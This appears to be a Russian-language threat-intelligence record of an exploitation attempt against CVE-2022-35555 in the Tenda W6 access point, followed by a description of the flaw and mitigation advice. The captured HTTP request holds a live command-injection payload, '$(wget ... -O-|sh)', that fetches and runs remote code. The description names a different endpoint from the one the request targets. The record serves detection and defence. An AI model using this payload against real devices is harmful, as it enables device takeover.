Информация об атаке

Tag
CVE-2022-35555
Date
2024-09-27
Client IP
185.224.128.67
Client GEO
the netherlands 
Vendor
Tenda 
Product
Tenda W6 V1.0.0.9(4122) 
RAW request
POST /goform/formJsonAjaxReq HTTP/1.0
User-Agent: Go-http-client/1.1
Host: ████████████
Content-Type: application/json
Content-Length: 167
X-Forwarded-For: ██████████████
Referer: http://████████████:80/home.asp
████████████████████████████████████████
Connection: close

{"action":"set_online","data":{"agree":1,"check_ip1":"███████","check_ip2":"$(wget http://█████████████/4g -O-|sh)","enable":1,"interval":"10","reboot_interval":"30"}}
Description

CVE-2022-35555 - это критическая уязвимость командной инъекции, обнаруженная в беспроводной точке доступа Tenda W6 V1.0.0.9(4122). Эта уязвимость существует в конечной точке /goform/exeCommand, где злоумышленники могут использовать параметр cmdinput для выполнения произвольных команд на устройстве. Уязвимость позволяет удаленным злоумышленникам получить контроль над устройством, что потенциально может привести к несанкционированному доступу, утечке данных или дальнейшему компрометации сети.

Уязвимость была сообщена несколькими источниками, включая Национальную базу данных уязвимостей (NVD), MITRE, Tenable, GitHub, OpenCVE, VulDB, Cloud Defense и FortiGuard Labs. Несмотря на свою критическую природу, SUSE CVE-2022-35555 была отмечена как "ОТКЛОНЕНА" ее CNA, что указывает на то, что она не была признана проблемой безопасности. Однако другие источники подтвердили ее существование и потенциальное воздействие.

Злоумышленники могут использовать эту уязвимость, отправляя специально сформированные HTTP-запросы на уязвимую конечную точку. Эксплуатация не требует аутентификации, что облегчает злоумышленникам нацеливание на открытые устройства. После эксплуатации злоумышленники могут выполнять произвольные команды с теми же привилегиями, что и веб-сервер, что может привести к полной компрометации системы.

Критичность этой уязвимости высока из-за легкости эксплуатации и потенциального воздействия на затронутые системы. Администраторам сетей и специалистам по безопасности следует в первую очередь устранить эту уязвимость, чтобы предотвратить возможные атаки.

Mitigations

Для снижения риска, связанного с CVE-2022-35555, пользователям следует предпринять следующие шаги:

  1. Обновление прошивки: Проверьте наличие обновлений прошивки от Tenda и примените любые доступные патчи, устраняющие эту уязвимость.
  2. Ограничение доступа: Ограничьте доступ к интерфейсу управления устройством Tenda W6 только доверенным сетям. Используйте правила брандмауэра для блокировки несанкционированного доступа.
  3. Мониторинг трафика: Внедрите мониторинг сети для обнаружения любой необычной активности, которая может указывать на попытки эксплуатации.
  4. Отключение неиспользуемых сервисов: Отключите любые сервисы или функции на устройстве Tenda W6, которые не используются, чтобы уменьшить поверхность атаки.
  5. Регулярные аудиты: Проводите регулярные аудиты безопасности сетевых устройств, чтобы убедиться, что они настроены безопасно и обновлены до последних версий патчей.

Следуя этим шагам, пользователи могут снизить риск эксплуатации и защитить свою сеть от потенциальных атак.